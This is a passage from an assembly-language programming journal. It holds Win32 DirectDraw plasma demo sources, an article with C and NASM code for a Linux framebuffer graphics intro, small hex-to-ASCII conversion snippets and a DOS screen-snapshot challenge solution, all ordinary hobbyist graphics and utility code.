ret $31,($26),1 # Back to c-program
.end div # Mark end of function
-------------------------------------------------- cut here
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Direct Draw
Examples
by X-Calibre
As a follow-up to the Direct Draw article in APJ#5, here are two complete
DirectDraw sample programs. The first uses an 8-bit palette, while the
second uses a 32-bit (truecolor) palette. To compile these, you will need to
obtain Ddraw.inc ( http://asmjournal.freeservers.com/files/Ddraw.inc.html )
for the necessary DirectDraw definitions.
;Ddplasma8.asm_________________________________________________________________
;---------------------------------------;
; DDRAW Plasma Demo ;
; ;
; Author : X-Calibre ;
; ASM version : Ewald Snel ;
; Copyright (C) 1999, Diamond Crew ;
; ;
; http://here.is/diamond/ ;
;---------------------------------------;
TITLE WIN32ASM EXAMPLE
.486
.MODEL FLAT, STDCALL
option casemap :none
;-----------------------------------------------------------;
; WIN32ASM / DDRAW PLASMA DEMO ;
;-----------------------------------------------------------;
INCLUDE \masm32\include\windows.inc
; -----------------------------------
; Note that the following is the
; include file written by Ewald Snel.
; -----------------------------------
INCLUDE \masm32\include\ddraw.inc
INCLUDE \masm32\include\gdi32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\user32.inc
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\ddraw.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
nextFrame PROTO
initPlasma PROTO
RETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
LRETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
leave
ret
ENDM
FATAL MACRO msg
LOCAL @@msg
.DATA
@@msg db msg, 0
.CODE
INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
INVOKE ExitProcess, 0
ENDM
.DATA?
hWnd HWND ? ; surface window
lpDD LPDIRECTDRAW ? ; DDraw object
lpDDSPrimary LPDIRECTDRAWSURFACE ? ; DDraw primary surface
ddsd DDSURFACEDESC <?> ; DDraw surface descriptor
ddscaps DDSCAPS <?> ; DDraw capabilities
palette dd 256 dup (?)
table dd 512 dup (?)
lpDDPalette dd ?
.DATA
ddwidth EQU 320 ; display mode width
ddheight EQU 200 ; display mode height
ddbpp EQU 8 ; display mode color depth
phaseA dd 0
phaseB dd 0
factor1 EQU -2
factor2 EQU -1
factor3 EQU 1
factor4 EQU -2
red dd 500.0
green dd 320.0
blue dd 372.0
scale1 dd 2.0
scale2 dd 128.0
scale3 dd 256.0
scale4 dd 127.0
szClassName db "DDRAW Plasma Demo", 0 ; class name
szDisplayName EQU <szClassName> ; window name
color dd 0
wc WNDCLASSEX < SIZEOF WNDCLASSEX, CS_HREDRAW OR
CS_VREDRAW,
OFFSET WndProc, 0, 0, , 0, 0, , 0,
OFFSET szClassName,
0
>
.CODE
start:
INVOKE GetModuleHandle, NULL
INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
INVOKE ExitProcess, eax
;-----------------------------------------------------------;
; Calculate Next Plasma Frame ;
;-----------------------------------------------------------;
nextFrame PROC
push ebx
push esi
push edi
mov ecx , ddheight ; # of scanlines
mov edi , [ddsd.lpSurface] ; pixel output
@@scanline:
push ecx
push edi
mov esi , [phaseA]
mov edx , [phaseB]
sub esi , ecx
and edx , 0ffH
and esi , 0ffH
mov edx , [table][4*edx][256*4]
mov esi , [table][4*esi] ; [x] + table0[a + y]
sub edx , ecx ; [y] + table1[b]
mov ecx , ddwidth ; [x] --> pixel counter
@@pixel:
and esi , 0ffH
and edx , 0ffH
mov eax , [table][4*esi]
mov ebx , [table][4*edx][256*4]
add eax , ebx
add esi , factor3
shr eax , 1
inc edi
add edx , factor4
dec ecx
mov [edi][-1] , al
jnz @@pixel
pop edi
pop ecx
add edi , [ddsd.lPitch] ; inc. display position
dec ecx
jnz @@scanline
add [phaseA] , factor1
add [phaseB] , factor2
pop edi
pop esi
pop ebx
ret
nextFrame ENDP
;-----------------------------------------------------------;
; Initalize Plasma Tables ;
;-----------------------------------------------------------;
initPlasma PROC
LOCAL @@i :DWORD
LOCAL @@r :DWORD
LOCAL @@g :DWORD
LOCAL @@b :DWORD
LOCAL temp :DWORD
mov [@@i] , 0
.WHILE @@i < 256
mov edx , [@@i]
; Calculate table0 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx]
; Calculate table1 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fcos
fmul REAL4 PTR [scale2]
fadd REAL4 PTR [scale2]
fldpi
fmulp st(1), st
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx][4*256]
; Calculate palette value
xor eax , eax
FOR comp, <red, green, blue>
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [comp]
fcos
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [temp]
shl eax , 8
or eax , [temp]
ENDM
bswap eax
shr eax, 8
mov [palette][4*edx] , eax
inc [@@i]
.ENDW
; Set palette
DDINVOKE CreatePalette, lpDD, DDPCAPS_8BIT or DDPCAPS_ALLOW256,
ADDR palette, ADDR lpDDPalette, NULL
.IF eax != DD_OK
FATAL "Couldn't create palette"
.ENDIF
DDSINVOKE SetPalette, lpDDSPrimary, lpDDPalette
.IF eax != DD_OK
FATAL "Couldn't set palette"
.ENDIF
ret
initPlasma ENDP
;-----------------------------------------------------------;
; WinMain ( entry point ) ;
;-----------------------------------------------------------;
WinMain PROC hInst :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
LOCAL msg :MSG
; Fill WNDCLASSEX structure with required variables
mov eax , [hInst]
mov [wc.hInstance] , eax
INVOKE GetStockObject , BLACK_BRUSH
mov [wc.hbrBackground] , eax
INVOKE RegisterClassEx, ADDR wc
; Create window at following size
INVOKE CreateWindowEx, 0,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP,
0, 0, ddwidth, ddheight,
NULL, NULL,
hInst, NULL
mov [hWnd] , eax
INVOKE ShowWindow, hWnd, SW_MAXIMIZE
INVOKE SetFocus, hWnd
INVOKE ShowCursor, 0
; Initialize display
INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
.IF eax != DD_OK
FATAL "Couldn't init DirectDraw"
.ENDIF
DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR
DDSCL_FULLSCREEN
.IF eax != DD_OK
FATAL "Couldn't set DirectDraw cooperative level"
.ENDIF
DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
.IF eax != DD_OK
FATAL "Couldn't set display mode"
.ENDIF
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_CAPS
mov [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
.IF eax != DD_OK
FATAL "Couldn't create primary surface"
.ENDIF
call initPlasma
; Loop until PostQuitMessage is sent
.WHILE 1
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF eax != 0
.IF msg.message == WM_QUIT
INVOKE PostQuitMessage, msg.wParam
.BREAK
.ELSE
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
.ELSE
INVOKE GetFocus
.IF eax == hWnd
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_PITCH
.WHILE 1
DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd,
DDLOCK_WAIT, NULL
.BREAK .IF eax == DD_OK
.IF eax == DDERR_SURFACELOST
DDSINVOKE Restore, lpDDSPrimary
.ELSE
FATAL "Couldn't lock surface"
.ENDIF
.ENDW
DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN,
NULL
call nextFrame
DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface
.ENDIF
.ENDIF
.ENDW
.IF lpDD != NULL
.IF lpDDSPrimary != NULL
DDSINVOKE Release, lpDDSPrimary
mov [lpDDSPrimary] , NULL
.ENDIF
DDINVOKE Release, lpDD
mov [lpDD] , NULL
.ENDIF
LRETURN msg.wParam
WinMain ENDP
;-----------------------------------------------------------;
; Window Proc ( handle events ) ;
;-----------------------------------------------------------;
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_KEYDOWN
.IF wParam == VK_ESCAPE
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
.ELSEIF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
INVOKE DefWindowProc, hWin, uMsg, wParam, lParam
ret
WndProc ENDP
END start
;End_Ddplasma8.asm_____________________________________________________________
;Ddplasma32.asm________________________________________________________________
;---------------------------------------;
; DDRAW Plasma Demo ;
; ;
; Author : X-Calibre ;
; ASM version : Ewald Snel ;
; Copyright (C) 1999, Diamond Crew ;
; ;
; http://here.is/diamond/ ;
;---------------------------------------;
TITLE WIN32ASM EXAMPLE
.386
.MODEL FLAT, STDCALL
option casemap :none
;-----------------------------------------------------------;
; WIN32ASM / DDRAW PLASMA DEMO ;
;-----------------------------------------------------------;
INCLUDE \masm32\include\windows.inc
; -----------------------------------
; Note that the following is the
; include file written by Ewald Snel.
; -----------------------------------
INCLUDE .\ddraw.inc
INCLUDE \masm32\include\gdi32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\user32.inc
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\ddraw.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
nextFrame PROTO
initPlasma PROTO
RETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
LRETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
leave
ret
ENDM
FATAL MACRO msg
LOCAL @@msg
.DATA
@@msg db msg, 0
.CODE
INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
INVOKE ExitProcess, 0
ENDM
.DATA?
palette dd 256 dup (?)
table dd 512 dup (?)
hWnd HWND ? ; surface window
lpDD LPDIRECTDRAW ? ; DDraw object
lpDDSPrimary LPDIRECTDRAWSURFACE ? ; DDraw primary surface
ddsd DDSURFACEDESC <?> ; DDraw surface descriptor
ddscaps DDSCAPS <?> ; DDraw capabilities
.DATA
ddwidth EQU 320 ; display mode width
ddheight EQU 200 ; display mode height
ddbpp EQU 32 ; display mode color depth
phaseA dd 0
phaseB dd 0
factor1 EQU -2
factor2 EQU -1
factor3 EQU 1
factor4 EQU -2
red dd 500.0
green dd 320.0
blue dd 372.0
scale1 dd 2.0
scale2 dd 128.0
scale3 dd 256.0
scale4 dd 127.0
szClassName db "DDRAW Plasma Demo", 0 ; class name
szDisplayName EQU <szClassName> ; window name
color dd 0
wc WNDCLASSEX < SIZEOF WNDCLASSEX, CS_HREDRAW OR
CS_VREDRAW,
OFFSET WndProc, 0, 0, , 0, 0, , 0,
OFFSET szClassName,
0 >
.CODE
start:
INVOKE GetModuleHandle, NULL
INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
INVOKE ExitProcess, eax
;-----------------------------------------------------------;
; Calculate Next Plasma Frame ;
;-----------------------------------------------------------;
nextFrame PROC
push ebx
push esi
push edi
mov ecx , ddheight ; # of scanlines
mov edi , [ddsd.lpSurface] ; pixel output
@@scanline:
push ecx
push edi
mov esi , [phaseA]
mov edx , [phaseB]
sub esi , ecx
and edx , 0ffH
and esi , 0ffH
mov edx , [table][4*edx][256*4]
mov esi , [table][4*esi] ; [x] + table0[a + y]
sub edx , ecx ; [y] + table1[b]
mov ecx , ddwidth ; [x] --> pixel counter
@@pixel:
and esi , 0ffH
and edx , 0ffH
mov eax , [table][4*esi]
mov ebx , [table][4*edx][256*4]
add eax , ebx
add esi , factor3
shr eax , 1
add edx , factor4
and eax , 0ffH
add edi , 4
mov eax , [palette][4*eax]
dec ecx
mov [edi][-4] , eax
jnz @@pixel
pop edi
pop ecx
add edi , [ddsd.lPitch] ; inc. display position
dec ecx
jnz @@scanline
add [phaseA] , factor1
add [phaseB] , factor2
pop edi
pop esi
pop ebx
ret
nextFrame ENDP
;-----------------------------------------------------------;
; Initalize Plasma Tables ;
;-----------------------------------------------------------;
initPlasma PROC
LOCAL @@i :DWORD
LOCAL @@r :DWORD
LOCAL @@g :DWORD
LOCAL @@b :DWORD
LOCAL temp :DWORD
mov [@@i] , 0
.WHILE @@i < 256
mov edx , [@@i]
; Calculate table0 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx]
; Calculate table1 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fcos
fmul REAL4 PTR [scale2]
fadd REAL4 PTR [scale2]
fldpi
fmulp st(1), st
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx][4*256]
; Calculate palette value
xor eax , eax
FOR comp, <red, green, blue>
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [comp]
fcos
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [temp]
shl eax , 8
or eax , [temp]
ENDM
mov [palette][4*edx] , eax
inc [@@i]
.ENDW
ret
initPlasma ENDP
;-----------------------------------------------------------;
; WinMain ( entry point ) ;
;-----------------------------------------------------------;
WinMain PROC hInst :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
LOCAL msg :MSG
; Fill WNDCLASSEX structure with required variables
mov eax , [hInst]
mov [wc.hInstance] , eax
INVOKE GetStockObject, BLACK_BRUSH
mov [wc.hbrBackground] , eax
INVOKE RegisterClassEx, ADDR wc
; Create window at following size
INVOKE CreateWindowEx, 0,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP,
0, 0, ddwidth, ddheight,
NULL, NULL,
hInst, NULL
mov [hWnd] , eax
INVOKE ShowWindow, hWnd, SW_MAXIMIZE
INVOKE SetFocus, hWnd
INVOKE ShowCursor, 0
; Initialize display
INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
.IF eax != DD_OK
FATAL "Couldn't init DirectDraw"
.ENDIF
DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR
DDSCL_FULLSCREEN
.IF eax != DD_OK
FATAL "Couldn't set DirectDraw cooperative level"
.ENDIF
DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
.IF eax != DD_OK
FATAL "Couldn't set display mode"
.ENDIF
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_CAPS
mov [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
.IF eax != DD_OK
FATAL "Couldn't create primary surface"
.ENDIF
call initPlasma
; Loop until PostQuitMessage is sent
.WHILE 1
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF eax != 0
.IF msg.message == WM_QUIT
INVOKE PostQuitMessage, msg.wParam
.BREAK
.ELSE
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
.ELSE
INVOKE GetFocus
.IF eax == hWnd
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_PITCH
.WHILE 1
DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd,
DDLOCK_WAIT, NULL
.BREAK .IF eax == DD_OK
.IF eax == DDERR_SURFACELOST
DDSINVOKE Restore, lpDDSPrimary
.ELSE
FATAL "Couldn't lock surface"
.ENDIF
.ENDW
DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN,
NULL
call nextFrame
DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface
.ENDIF
.ENDIF
.ENDW
.IF lpDD != NULL
.IF lpDDSPrimary != NULL
DDSINVOKE Release, lpDDSPrimary
mov [lpDDSPrimary] , NULL
.ENDIF
DDINVOKE Release, lpDD
mov [lpDD] , NULL
.ENDIF
LRETURN msg.wParam
WinMain ENDP
;-----------------------------------------------------------;
; Window Proc ( handle events ) ;
;-----------------------------------------------------------;
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_KEYDOWN
.IF wParam == VK_ESCAPE
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
.ELSEIF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
INVOKE DefWindowProc, hWin, uMsg, wParam, lParam
ret
WndProc ENDP
END start
;End_Ddplasma32.asm____________________________________________________________
I had mail problems last time... I don't think the example program from
the DDRAW tut ever reached you... and now you were looking for a Windows
article for issue #6... Maybe you can put the example in there... It's
Win32, and it would also double as a sequel to the article of issue #5
:)
Well, there's 2 examples actually... They look the same on screen, but 1
displays how to use 8 bit palette mode (like good old mode 13h), where
the other shows 32 bit truecolor mode...
I also included the original DDRAW.INC, so people can assemble the
sources themselves...
I hope this time it reaches you, and that I could have been of help to
you,
X-Calibre
WINDOWS
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Enter fbcon
by Konstantin
Boldyshev
Many of Linux users have heard something about fbcon. It is becoming more
and more popular, mostly because of capability of getting graphics on
usual terminal without X. How to use graphic capabilities of fbcon?
The /dev/fb# devices represent frame buffer devices; they allow the frame
buffer of a video card to be read and written to by a user, and allow a
programmer to access the video hardware [and, more importantly, the video
memory] through ioctls and memory mapping.
The general approach to using fbcon is pretty simple:
1) open /dev/fb0
2) mmap /dev/fb0
3) .. do the thing .. (use pointer returned by mmap to access videomemory)
4) munmap /dev/fb0
5) close /dev/fb0
I've taken one of my old DOS intros made in tasm, and rewritten it for nasm
and Linux/fbcon. At 408 bytes, This intro is the smallest implementation of
linear transformation with recursion (AFAIK).
Leaves.asm runs for about a minute and a half (depends on machine), and is
interruptible at any time with ^C. If everything is ok you should see two
branches of green leaves, and kinda wind blowing on them. It MUST be run
only
in 640x480x256 mode (vga=0x301 in lilo.conf). You will see garbage or
incorrect
colors in other modes.
Warning! Intro assumes that everything is ok with the system (/dev/fb0
exists,
can be opened and mmap()ed, correct video mode is set, and so on). So, if
you
ain't root, check permissions on /dev/fb0 first, or you will not see
anything.
The source is quite portable, you only need to implement putpixel() and
initial-
ization part for your OS. To get the basic idea across, here is the fbcon
implementation in C:
//==========================================================================
// leaves.c : C implementation using /dev/fb0
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
typedef unsigned char byte;
typedef unsigned int word;
typedef float dword;
#define MaxX 640
#define MaxY 480
#define VMEM_SIZE MaxX*MaxY
#define xc MaxX/2
#define yc MaxY/2
#define xmin0 100
#define xmax0 -xmin0
#define ymin0 xmin0
#define ymax0 -ymin0
#define colornum 8
int h;
byte *p;
byte ColorTable[colornum] = { 0x00,0x00,0x02,0x00,0x00,0x02,0x0A,0x02 };
int color=0;
dword f=MaxY/(ymax0-ymin0)*3/2;
dword x1coef=MaxX-MaxY*4/9-yc;
dword y1coef=MaxY/4+xc;
dword x2coef=MaxY*4/9+yc;
dword x0=110;
dword a=0.7;
dword b=0.2;
dword c=0.5;
dword d=0.3;
void putpixel(word x,word y,byte color)
{
*(p+y*MaxX+x) = color;
}
void leaves(dword x,dword y,byte n)
{
word x1,y1;
if (n>0)
{
y1=f*x+y1coef;
putpixel(x1coef-f*y,y1,ColorTable[color]);
putpixel(f*y+x2coef,y1,ColorTable[color]);
if (++color>colornum-1) color=0;
leaves(a*x+b*y, b*x-a*y, n-1);
leaves(c*(x-x0)-d*y+x0,d*(x-x0)+c*y,n-1);
}
}
int main(void)
{
int i;
p=mmap(0,VMEM_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED,open("/dev/fb0",O_RDWR),0);
for (i=0;i<VMEM_SIZE;i++) *(p+i) = 0;
leaves(0,0,28);
munmap(p,VMEM_SIZE);
close(h);
}
//--------------------------------------------------------------------------EOF
Here is the asm source. It is quite short and self-explaining :) Well,
actually
the source is badly optimized for size, contains some Linux-specific tricks,
and can be hard to understand. Please refer to the C source for areas that
need
clarification
NOTE: The following source was taken from asmutils and requires asmutils
macros (*.inc), available from http://linuxassembly.org;
you can also download binary there (in samples archive)
To compile leaves.asm:
$ nasm -f elf leaves.asm
$ ld -s -o leaves leaves.o
;==========================================================================
;Copyright (C) 1999 Konstantin Boldyshev <konst@...>
;
;leaves - fbcon intro in 408 bytes
;
;Ah, /if haven't guessed yet/ license is GPL, so enjoy! :)
%include "system.inc"
%assign SIZE_X 640
%assign SIZE_Y 480
%assign DEPTH 8
%assign VMEM_SIZE SIZE_X*SIZE_Y
%define MaxX 640.0
%define MaxY 480.0
%define xc MaxX/2
%define yc MaxY/2
%define xmin0 100.0
%define xmax0 -xmin0
%define ymin0 xmin0
%define ymax0 -ymin0
CODESEG
;al - color
putpixel:
push edx
lea edx,[ebx+ebx*4] ;computing offset..
shl edx,byte 7 ;multiply on 640
add edx,[esp+8] ;
mov [edx+esi],al ;write to frame buffer
pop edx
_return:
ret
; recursive function itself
leaves:
mov ecx,[esp+12]
test cl,cl
jz _return
mov [esp-13],cl
mov eax,[edi]
push ecx
sub esp,byte 8
mov edx,esp
fld dword [ebp+16] ;[f]
fld st0
fld st0
fmul dword [edx+16]
fadd dword [ebp+24] ;[y1coef]
fistp dword [edx]
mov ebx,[edx]
fmul dword [edx+20]
fsubr dword [ebp+20] ;[x1coef]
fistp dword [edx]
call putpixel
fmul dword [edx+20]
fadd dword [ebp+28] ;[x2coef]
fistp dword [edx]
call putpixel
inc edi
cmp edi,ColorEnd
jl .rec
sub edi,byte ColorEnd-ColorBegin
.rec:
fld dword [ebp+4] ;[b]
fld dword [ebp] ;[a]
fld st1
fld st1
fxch
fmul dword [edx+16]
fxch
fmul dword [edx+20]
fsubp st1
fstp dword [edx-8]
fmul dword [edx+16]
fxch
fmul dword [edx+20]
faddp st1
dec ecx
push ecx
sub esp,byte 8
fstp dword [esp]
call leaves ;esp+12
mov edx,esp
fld dword [ebp+12] ;[d]
fld dword [edx+28]
fld dword [ebp+8] ;[c]
fld dword [ebp+32] ;[x0]
fsub to st2
fld st3
fld st2
fxch
fmul st4
fxch
fmul dword [edx+32]
faddp st1
fstp dword [edx-8]
fxch
fmulp st2
fxch st2
fmul dword [edx+32]
fsubp st1
faddp st1
push ecx
sub esp,byte 8
fstp dword [esp]
call leaves
add esp,byte 12*2+8
pop ecx
.return:
ret
;------------------------------------- main()
START:
;prepare structure for mmap on the stack
mov edi,VMEM_SIZE
mov esi,esp
mov [esi-16],edi ;.len
mov [esi-12],byte PROT_READ|PROT_WRITE ;.prot
mov [esi-8],byte MAP_SHARED ;.flags
mov [esi],edx ;.offset
;init fb
mov ebp,Params
lea ebx,[ebp+0x2C] ;fb-Params
sys_open EMPTY,O_RDWR
test eax,eax ;have we opened file?
js exit
mov [esi-4],eax ;mm.fd
lea ebx,[esi-20]
sys_mmap
test eax,eax ;have we mmaped file?
js exit
mov esi,eax
;clear screen
mov ecx,edi
mov edi,esi
xor eax,eax
rep stosb
;leaves
lea edi,[ebp+0x24] ;ColorBegin-Params
push byte 28 ;recursion depth
push eax
push eax
call leaves
;close fb
sys_munmap esi,VMEM_SIZE
sys_close [mm.fd]
exit:
sys_exit
;----------------------------Parameters
Params:
a dd 0.7
b dd 0.2
c dd 0.5
d dd 0.3
f dd 0xc0400000 ;MaxY/(ymax0-ymin0)*3/2
x1coef dd 0x433b0000 ;MaxX-MaxY*4/9-yc
y1coef dd 0x43dc0000 ;MaxY/4+xc
x2coef dd 0x43e28000 ;MaxY*4/9+yc
x0 dd 112.0
ColorBegin:
db 0,0,2,0,0,2,10,2
ColorEnd:
fb db "/dev/fb0";,NULL
END
;===========================================================================EOF
More information on the frame buffer device can be found in the Linux kernel
documentation [ usually /usr/src/linux/Documentation ] files
framebuffer.txt,
internals.txt, matroxfb.txt, tgafb.txt, and vesafb.txt. The /dev/fbcon#
ioctls
are defined in /usr/include/linux/fb.h .
Enjoy the demo!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
TOHEX
by
Ronald
;Summary: Convert hexadecimal digits to ASCII
;Compatibility: PowerPC platform
;Notes: Reads 3 parameters in R1-R3
; R1 = Number to convert to ASCII representation
; R2 = Number of LSD's of R1 to convert
; R3 = Address to store ASCII representation of number to
; R31 = Temp register that holds 4 bits
; Note that R1 is ruined during execution
.global TOHEX, TOHEX_LOOP, LT_TEN, STEP_OVER, TOHEX_EXIT
TOHEX:
cmpwi R2, 0
be TOHEX_EXIT
TOHEX_LOOP:
andi. R31, R1, 15
cmpwi R31, 10
blt LT_TEN
addi R31, R31, 'A'-10
b STEP_OVER
LT_TEN:
ori R31, R31, '0'
STEP_OVER:
srwi R1, R1, 4
subi R2, R2, 1
stbx R31, R2, R3
cmpwi R2, 0
bne TOHEX_LOOP
TOHEX_EXIT:
blr
Hex2ASCII
by
cpuburn
;Summary: Converts
;Compatibility: K7
;Notes: This
; While doing some light reading of the AMD K7 Athlon Optimization
;Manual, I came across one of the neatest hex-to-ASCII converters
;I've ever seen:
Example 5 - Hexadecimal to ASCII conversion
(y=x < 10 ? x + 0x30: x + 0x41):
MOV AL, [X] ;load X value
CMP AL, 10 ;if x is less than 10, set carry flag
SBB AL, 69h ;0..9 -> 96h, Ah.. h -> A1h...A6h
DAS ;0..9: subtract 66h, Ah.. h: Sub. 60h
MOV [Y],AL ;save conversion in y
MMX ltostr
by Cecchinel
Stephan
;Summary: Convert long [dword] value to an ASCII string
;Compatibility: MMX
;Notes: Converts a number in EAX to an 8 bytes hexadecimal string
; at [edi]
; 14 clocks on a Celeron-333
Sum1: dd 0x30303030, 0x30303030
Mask1: dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1: dd 0x09090909, 0x09090909
Hex32:
bswap eax
movq mm3,[Sum1]
movq mm4,[Comp1]
movq mm2,[Mask1]
movq mm5,mm3
psubb mm5,mm4
movd mm0,eax
movq mm1,mm0
psrlq mm0,4
pand mm0,mm2
pand mm1,mm2
punpcklbw mm0,mm1
movq mm1,mm0
pcmpgtb mm0,mm4
pand mm0,mm5
paddb mm1,mm3
paddb mm1,mm0
movq [edi],mm1
ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
by Laura
Fairhead
Challenge
~~~~~~~~~
Write a program that takes a snapshot of a text screen and writes it
to a file. It should work in any text mode and lines should be terminated
with newlines in the file so that it can easily be viewed in a standard
editor. ( 04Dh = 77 bytes )
Solution
~~~~~~~~
If you want to assemble this just remember FS = 064h, as MASM can't cope
with legal x86 code. Then just replace the (single) offset 0148h with
some name, then data is the filename at the end "SNAP",0. Obviously
the B's prefixing the addresses mean "BYTE PTR", and ALL the numbers
are in HEX.
=Z10 0
=NSUC0.COM
=L
0000004D
=U100 147
1CB6:0100 B8 30 11 MOV AX,1130
1CB6:0103 32 FF XOR BH,BH
1CB6:0105 CD 10 INT 10 ;DL=rows-1
1CB6:0107 B4 0F MOV AH,0F
1CB6:0109 CD 10 INT 10 ;AH=columns
1CB6:010B 0E PUSH CS ;1st BIOS call
1CB6:010C 07 POP ES ;corrupts ES
1CB6:010D 52 PUSH DX ;
1CB6:010E 50 PUSH AX ;set B[BP+1]=columns
1CB6:010F 8B EC MOV BP,SP ; B[BP+2]=rows
1CB6:0111 BA 48 01 MOV DX,0148 ;open (CREATE) file
1CB6:0114 33 C9 XOR CX,CX ;name "SNAP"
1CB6:0116 B4 3C MOV AH,3C
1CB6:0118 CD 21 INT 21
1CB6:011A 93 XCHG BX,AX ;handle stays in BX
1CB6:011B 33 F6 XOR SI,SI ;SI read screen offset
1CB6:011D BA 80 00 MOV DX,0080 ;DX data store in PSP
1CB6:0120 B8 00 B8 MOV AX,B800
1CB6:0123 8E E0 MOV FS,AX ;FS screen segment
1CB6:0125 8B FA MOV DI,DX ;outer loop rows
1CB6:0127 0F B6 4E 01 MOVZX CX,B [BP+0001] ;miss out the attribute
1CB6:012B 64 AD FS: LODSW ;byte, copying to
1CB6:012D AA STOSB ;DS:080
1CB6:012E E2 FB LOOP 012B
1CB6:0130 B8 0D 0A MOV AX,0A0D ;n/l on row end
1CB6:0133 AB STOSW
1CB6:0134 8B CF MOV CX,DI
